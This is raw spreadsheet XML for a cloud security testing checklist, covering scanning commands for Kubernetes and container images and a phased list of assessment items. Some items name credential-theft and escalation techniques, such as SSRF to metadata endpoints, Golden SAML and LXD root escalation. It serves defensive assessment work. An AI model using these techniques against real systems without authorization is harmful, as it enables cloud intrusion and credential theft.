    <t>Run CIS Kubernetes Benchmark checks on all cluster nodes and the API server to verify secure configuration of the Kubernetes control plane and worker nodes.</t>
  </si>
  <si>
    <t>kube-bench, kube-hunter, kubectl</t>
  </si>
  <si>
    <t>1. Run kube-bench master: docker run --pid=host --rm -v /etc:/etc:ro -v /var/lib:/var/lib:ro aquasec/kube-bench:latest master
2. Run kube-bench node: docker run --pid=host --rm -v /etc:/etc:ro aquasec/kube-bench:latest node
3. Run kube-hunter: kube-hunter --remote &lt;k8s-api-ip&gt; --report json &gt; kube-hunter.json
4. Check etcd encryption: kubectl get --raw /api/v1/secrets | python3 (verify encrypted at rest)
5. Run: prowler kubernetes --services etcd apiserver
6. Check NetworkPolicies: kubectl get networkpolicies --all-namespaces</t>
  </si>
  <si>
    <t>Pass: kube-bench returns minimal WARN/FAIL findings. Etcd encrypted at rest. NetworkPolicies in place. API server requires authentication. Fail: Critical kube-bench findings, no etcd encryption, or anonymous API access.</t>
  </si>
  <si>
    <t>CSEC-HARD-006</t>
  </si>
  <si>
    <t>Container Image Vulnerability Scanning</t>
  </si>
  <si>
    <t>Scan all container images in use across the environment for known CVEs using automated vulnerability scanners, prioritising Critical and High severity findings.</t>
  </si>
  <si>
    <t>Trivy, Clair, Snyk, AWS ECR</t>
  </si>
  <si>
    <t>1. Scan specific image: trivy image &lt;image&gt;:&lt;tag&gt; --severity CRITICAL,HIGH
2. Scan ECR image: trivy image &lt;acct&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com/&lt;repo&gt;:&lt;tag&gt;
3. Scan with JSON output: trivy image --format json --output trivy-results.json &lt;image&gt;
4. Scan Kubernetes pods: trivy k8s --all-namespaces --report summary
5. Enable ECR scanning: aws ecr put-image-scanning-configuration --repository-name &lt;repo&gt; --image-scanning-configuration scanOnPush=true
6. Get ECR scan results: aws ecr describe-image-scan-findings --repository-name &lt;repo&gt; --image-id imageTag=latest</t>
  </si>
  <si>
    <t>Pass: No Critical CVEs in production images. High CVEs have documented remediation timelines. Image scanning enabled in CI/CD and ECR. Fail: Critical CVEs present in production container images without remediation plan.</t>
  </si>
  <si>
    <t>Cloud Security Testing Guide – Master Reference Checklist</t>
  </si>
  <si>
    <t>Remarks</t>
  </si>
  <si>
    <t>Search GitHub/GitLab for AWS keys, Azure strings, GCP JSON keys</t>
  </si>
  <si>
    <t>TruffleHog, GitLeaks</t>
  </si>
  <si>
    <t>Cloud Storage Bucket Enumeration</t>
  </si>
  <si>
    <t>Discover public S3, Azure Blob, GCS buckets</t>
  </si>
  <si>
    <t>S3Scanner, AWS CLI, gsutil</t>
  </si>
  <si>
    <t>Cloud Infrastructure Fingerprinting</t>
  </si>
  <si>
    <t>Identify CSP, region, services via DNS/HTTP headers</t>
  </si>
  <si>
    <t>dig, curl, Shodan</t>
  </si>
  <si>
    <t>Subdomain Enumeration and Takeover Testing</t>
  </si>
  <si>
    <t>Enumerate subdomains, check for dangling CNAMEs</t>
  </si>
  <si>
    <t>subfinder, amass, nuclei</t>
  </si>
  <si>
    <t>Certificate Transparency Log Mining</t>
  </si>
  <si>
    <t>Discover hidden cloud assets via CT logs</t>
  </si>
  <si>
    <t>Phase 2: IAM Testing</t>
  </si>
  <si>
    <t>Map all IAM users, roles, groups, policies</t>
  </si>
  <si>
    <t>Graph-based analysis of all escalation paths</t>
  </si>
  <si>
    <t>PMapper, Pacu</t>
  </si>
  <si>
    <t>AWS IAM Privilege Escalation Exploitation</t>
  </si>
  <si>
    <t>Test all escalation techniques (policy manipulation, role assumption)</t>
  </si>
  <si>
    <t>AWS IAM Access Key Age and Rotation</t>
  </si>
  <si>
    <t>Find stale, unused access keys</t>
  </si>
  <si>
    <t>Azure AD Enumeration</t>
  </si>
  <si>
    <t>Map all Azure AD users, groups, service principals, RBAC</t>
  </si>
  <si>
    <t>Azure CLI, AzureGraph, ROADtools</t>
  </si>
  <si>
    <t>Enumerate GCP IAM bindings and service account keys</t>
  </si>
  <si>
    <t>MFA Enforcement Assessment</t>
  </si>
  <si>
    <t>Verify MFA for all cloud platform users</t>
  </si>
  <si>
    <t>AWS CLI, Azure CLI, Prowler</t>
  </si>
  <si>
    <t>Phase 3: Compute &amp; Network</t>
  </si>
  <si>
    <t>EC2 Instance Security Configuration</t>
  </si>
  <si>
    <t>Security groups, EBS encryption, public snapshots</t>
  </si>
  <si>
    <t>EC2 IMDSv2 Enforcement</t>
  </si>
  <si>
    <t>Verify IMDSv2 required to prevent SSRF credential theft</t>
  </si>
  <si>
    <t>Exposed Docker API Exploitation</t>
  </si>
  <si>
    <t>Test unauthenticated Docker daemon on TCP 2375</t>
  </si>
  <si>
    <t>Container Security from Inside</t>
  </si>
  <si>
    <t>Privileged check, socket mount, capability assessment</t>
  </si>
  <si>
    <t>Linux shell commands</t>
  </si>
  <si>
    <t>Kubernetes Cluster Security</t>
  </si>
  <si>
    <t>RBAC, secrets, privileged pods, kube-hunter</t>
  </si>
  <si>
    <t>LXD/LXC Group Privilege Escalation</t>
  </si>
  <si>
    <t>lxd group membership to root via container host mount</t>
  </si>
  <si>
    <t>lxc, Alpine image</t>
  </si>
  <si>
    <t>Security Group and Network Segmentation</t>
  </si>
  <si>
    <t>Critical ports open to internet, VPC flow logs</t>
  </si>
  <si>
    <t>Phase 4: Storage Security</t>
  </si>
  <si>
    <t>AWS S3 Block Public Access Configuration</t>
  </si>
  <si>
    <t>Account and bucket level public access settings</t>
  </si>
  <si>
    <t>AWS S3 Encryption at Rest</t>
  </si>
  <si>
    <t>SSE-KMS or SSE-S3 on all buckets</t>
  </si>
  <si>
    <t>AWS S3 Access Logging</t>
  </si>
  <si>
    <t>Audit trail for all bucket data access events</t>
  </si>
  <si>
    <t>Azure Blob Storage Public Access</t>
  </si>
  <si>
    <t>Check for anonymous accessible containers</t>
  </si>
  <si>
    <t>GCS Bucket IAM Policy Assessment</t>
  </si>
  <si>
    <t>Check allUsers/allAuthenticatedUsers bindings</t>
  </si>
  <si>
    <t>Phase 5: SSRF &amp; Credential Theft</t>
  </si>
  <si>
    <t>SSRF to EC2 IMDS Credential Theft</t>
  </si>
  <si>
    <t>SSRF to 169.254.169.254 for IAM role credentials</t>
  </si>
  <si>
    <t>SSRF to Azure IMDS Token Theft</t>
  </si>
  <si>
    <t>SSRF for Managed Identity Bearer token</t>
  </si>
  <si>
    <t>SSRF to GCP Metadata Server</t>
  </si>
  <si>
    <t>SSRF for service account OAuth token</t>
  </si>
  <si>
    <t>Lambda Environment Variable Secrets</t>
  </si>
  <si>
    <t>Credentials stored in Lambda env vars</t>
  </si>
  <si>
    <t>Cognito Unauthenticated Credential Issuance</t>
  </si>
  <si>
    <t>Identity pool issues AWS credentials without login</t>
  </si>
  <si>
    <t>Phase 6: Platform-Specific Attacks</t>
  </si>
  <si>
    <t>AWS CloudTrail Configuration</t>
  </si>
  <si>
    <t>Multi-region, log validation, protected S3 bucket</t>
  </si>
  <si>
    <t>IAM Role Trust Policy Cross-Account Analysis</t>
  </si>
  <si>
    <t>External account trust, wildcard principals, OIDC conditions</t>
  </si>
  <si>
    <t>AWS Cognito User Pool Security</t>
  </si>
  <si>
    <t>User enumeration, MFA, password policy, auth flows</t>
  </si>
  <si>
    <t>Azure Storage HTTPS and TLS Enforcement</t>
  </si>
  <si>
    <t>HTTPS-only with TLS 1.2 minimum</t>
  </si>
  <si>
    <t>Azure Key Vault Access and Network Controls</t>
  </si>
  <si>
    <t>Access policies, soft delete, network restrictions</t>
  </si>
  <si>
    <t>GCP IAM Overly Permissive Role Bindings</t>
  </si>
  <si>
    <t>allUsers, primitive roles, external bindings</t>
  </si>
  <si>
    <t>Phase 7: Advanced Identity Attacks</t>
  </si>
  <si>
    <t>Golden SAML Attack</t>
  </si>
  <si>
    <t>Forge SAML tokens via stolen ADFS signing certificate</t>
  </si>
  <si>
    <t>Man-in-the-Cloud (MitC) Attack</t>
  </si>
  <si>
    <t>Steal and replace cloud sync tokens for persistent access</t>
  </si>
  <si>
    <t>Python3, cloud sync clients</t>
  </si>
  <si>
    <t>Cross-Cloud OIDC Trust Misconfiguration</t>
  </si>
  <si>
    <t>Overly broad OIDC sub claims allowing unauthorized role assumption</t>
  </si>
  <si>
    <t>AWS CLI, GitHub Actions</t>
  </si>
  <si>
    <t>Phase 8: Serverless Security</t>
  </si>
  <si>
    <t>Lambda Event Injection – SQL Injection</t>
  </si>
  <si>
    <t>SQLi via Lambda event data payloads</t>
  </si>
  <si>
    <t>Lambda SSTI Testing</t>
  </si>
  <si>
    <t>Jinja2/EJS template injection in Lambda functions</t>
  </si>
  <si>
    <t>CVE scan of Lambda deployment package dependencies</t>
  </si>
  <si>
    <t>pip-audit, npm audit, Trivy</t>
  </si>
  <si>
    <t>Lambda IAM Execution Role Over-Privilege</t>
  </si>
  <si>
    <t>Lambda roles with excessive permissions</t>
  </si>
  <si>
    <t>Azure Function Security Assessment</t>
  </si>
  <si>
    <t>Auth, hardcoded secrets, managed identity permissions</t>
  </si>
  <si>
    <t>Phase 9: Logging &amp; Monitoring</t>
  </si>
  <si>
    <t>AWS CloudTrail Completeness</t>
  </si>
  <si>
    <t>Multi-region, global events, validation, S3 Object Lock</t>
  </si>
  <si>
    <t>GuardDuty and Security Hub Enablement</t>
  </si>
  <si>
    <t>Threat detection active in all regions</t>
  </si>
  <si>
    <t>CIS Benchmark 4.x alarms for root, IAM, CloudTrail changes</t>
  </si>
  <si>
    <t>VPC Flow Log Enablement</t>
  </si>
  <si>
    <t>ALL traffic captured in all VPCs</t>
  </si>
  <si>
    <t>Phase 10: Compliance &amp; Hardening</t>
  </si>
  <si>
    <t>CIS AWS Benchmark Assessment</t>
  </si>
  <si>
    <t>Full automated CIS 1.5 AWS compliance scan</t>
  </si>
  <si>
    <t>Prowler, ScoutSuite</t>
  </si>
  <si>
    <t>CIS Azure Benchmark Assessment</t>
  </si>
  <si>
    <t>Full automated CIS 2.0 Azure compliance scan</t>
  </si>
  <si>
    <t>CIS GCP Benchmark Assessment</t>
  </si>
  <si>
    <t>Full automated CIS 3.0 GCP compliance scan</t>
  </si>
  <si>
    <t>Cloud Encryption at Rest Verification</t>
  </si>
  <si>
    <t>S3, RDS, EBS, Azure Storage, GCS encryption</t>
  </si>
  <si>
    <t>Kubernetes CIS Benchmark</t>
  </si>
  <si>
    <t>kube-bench CIS checks on all nodes</t>
  </si>
  <si>
    <t>kube-bench, kube-hunter</t>
  </si>
  <si>
    <t>CVE scan of all container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</si>
</sst>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2"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF1F4E79"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF7F6000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26"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="13"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color rgb="FF1F4E79"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF7F6000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF276221"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF9C0006"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF595959"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF843C0C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0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="5" fillId="8" borderId="1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50">
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF843C0C"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE4D6"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <sz val="11"/>
        <color rgb="FF595959"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F4E79"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFDDEBF7"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF9C0006"/>
        <name val="Arial"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="11"/>
        <color rgb="FF276221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1:G37"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G17" sqref="G17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="5" customWidth="1"/>
    <col min="2" max="2" width="35" customWidth="1"/>
    <col min="3" max="7" width="20" customWidth="1"/>
    <col min="8" max="8" width="5" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:7" ht="10.050000000000001" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="2" spans="2:7" ht="10.050000000000001" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="3" spans="2:7" ht="49.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B3" s="36" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="29"/>
      <c r="D3" s="29"/>
      <c r="E3" s="29"/>
      <c r="F3" s="29"/>
      <c r="G3" s="29"/>
    </row>
    <row r="4" spans="2:7" ht="25.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B4" s="34" t="s">
        <v>1</v>
      </c>
      <c r="C4" s="29"/>
      <c r="D4" s="29"/>
      <c r="E4" s="29"/>
      <c r="F4" s="29"/>
      <c r="G4" s="29"/>
    </row>
    <row r="5" spans="2:7" ht="18" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B5" s="33" t="s">
        <v>2</v>
      </c>
      <c r="C5" s="29"/>
      <c r="D5" s="29"/>
      <c r="E5" s="29"/>
      <c r="F5" s="29"/>
      <c r="G5" s="29"/>
    </row>
    <row r="6" spans="2:7" ht="13.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="7" spans="2:7" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B7" s="35" t="s">
        <v>3</v>
      </c>
      <c r="C7" s="29"/>
      <c r="D7" s="29"/>
      <c r="E7" s="29"/>
      <c r="F7" s="29"/>
      <c r="G7" s="29"/>
    </row>
    <row r="8" spans="2:7" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B8" s="15" t="s">
        <v>4</v>
      </c>
      <c r="C8" s="30" t="s">
        <v>5</v>
      </c>
      <c r="D8" s="29"/>
      <c r="E8" s="29"/>
      <c r="F8" s="29"/>
      <c r="G8" s="29"/>
    </row>
    <row r="9" spans="2:7" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B9" s="16" t="s">
        <v>6</v>
      </c>
      <c r="C9" s="30" t="s">
        <v>7</v>
      </c>
      <c r="D9" s="29"/>
      <c r="E9" s="29"/>
      <c r="F9" s="29"/>
      <c r="G9" s="29"/>
    </row>
    <row r="10" spans="2:7" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B10" s="17" t="s">
        <v>8</v>
      </c>
      <c r="C10" s="30" t="s">
        <v>9</v>
      </c>
      <c r="D10" s="29"/>
      <c r="E10" s="29"/>
      <c r="F10" s="29"/>
      <c r="G10" s="29"/>
    </row>
    <row r="11" spans="2:7" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B11" s="18" t="s">
        <v>10</v>
      </c>
      <c r="C11" s="30" t="s">
        <v>11</v>
      </c>
      <c r="D11" s="29"/>
      <c r="E11" s="29"/>
      <c r="F11" s="29"/>
      <c r="G11" s="29"/>
    </row>
    <row r="12" spans="2:7" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B12" s="19" t="s">
        <v>12</v>
      </c>
      <c r="C12" s="30" t="s">
        <v>13</v>
      </c>
      <c r="D12" s="29"/>
      <c r="E12" s="29"/>
      <c r="F12" s="29"/>
      <c r="G12" s="29"/>
    </row>
    <row r="13" spans="2:7" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="B13" s="20" t="s">
        <v>14</v>
      </c>
      <c r="C13" s="30" t="s">
        <v>15</v>
      </c>
      <c r="D13" s="29"/>
      <c r="E13" s="29"/>
      <c r="F13" s="29"/>
      <c r="G13" s="29"/>
    </row>
    <row r="14" spans="2:7" ht="13.95" customHeight="1" x14ac:dyDescent="0.3"/>
    <row r="15" spans="2:7" ht="15.6" x14ac:dyDescent="0.3">
      <c r="B15" s="31" t="s">
        <v>16</v>
      </c>
      <c r="C15" s="29"/>
      <c r="D15" s="29"/>
      <c r="E15" s="29"/>
      <c r="F15" s="29"/>
      <c r="G15" s="29"/>
    </row>
    <row r="16" spans="2:7" x14ac:dyDescent="0.3">
      <c r="B16" s="21" t="s">
        <v>17</v>
      </c>
      <c r="C16" s="21" t="s">
        <v>18</v>
      </c>
      <c r="D16" s="21" t="s">
        <v>19</v>
      </c>
      <c r="E16" s="21" t="s">
        <v>20</v>
      </c>
      <c r="F16" s="21" t="s">
        <v>21</v>
      </c>
      <c r="G16" s="21" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="17" spans="2:7" ht="55.2" x14ac:dyDescent="0.3">
      <c r="B17" s="22" t="s">
        <v>23</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>24</v>
      </c>
      <c r="D17" s="23" t="s">
        <v>25</v>
      </c>
      <c r="E17" s="4" t="s">
        <v>26</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>27</v>
      </c>
      <c r="G17" s="18" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="18" spans="2:7" ht="27.6" x14ac:dyDescent="0.3">
      <c r="B18" s="24" t="s">
        <v>29</v>
      </c>
      <c r="C18" s="9" t="s">
        <v>30</v>
      </c>
      <c r="D18" s="25" t="s">
        <v>31</v>
      </c>
      <c r="E18" s="9" t="s">
        <v>32</v>
      </c>
      <c r="F18" s="9" t="s">
